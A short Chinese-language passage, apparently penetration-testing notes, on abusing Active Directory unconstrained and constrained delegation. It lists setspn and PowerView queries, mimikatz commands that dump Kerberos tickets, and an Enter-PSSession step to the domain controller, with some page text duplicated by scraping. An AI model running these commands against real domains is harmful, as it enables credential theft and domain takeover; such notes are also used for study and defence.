账户委派
账户非受限委派
设置用户y为服务账户(服务账户有委派权限)
>setspn -U -A variant/golden y
账户受限委派
最后更新于
这有帮助吗?
设置用户y为服务账户(服务账户有委派权限)
>setspn -U -A variant/golden y最后更新于
这有帮助吗?
这有帮助吗?
查询非受限委派域内账号,使用powerview
>Get-NetUser -Unconstrained -Domain zone.com利用
管理员权限打开mimikatz导出TGT
>privilege::debug
>sekurlsa::tickets /export清空票据,导入票据获得Powershell会话
> Enter-PSSession -ComputerName dc.zone.com查询受限委派用户
> Get-DomainUser -TrustedToAuth –Domain zone.com查询受限委派主机
> Get-DomainComputer -TrustedToAuth -Domain zone.com利用方法后见权限维持模块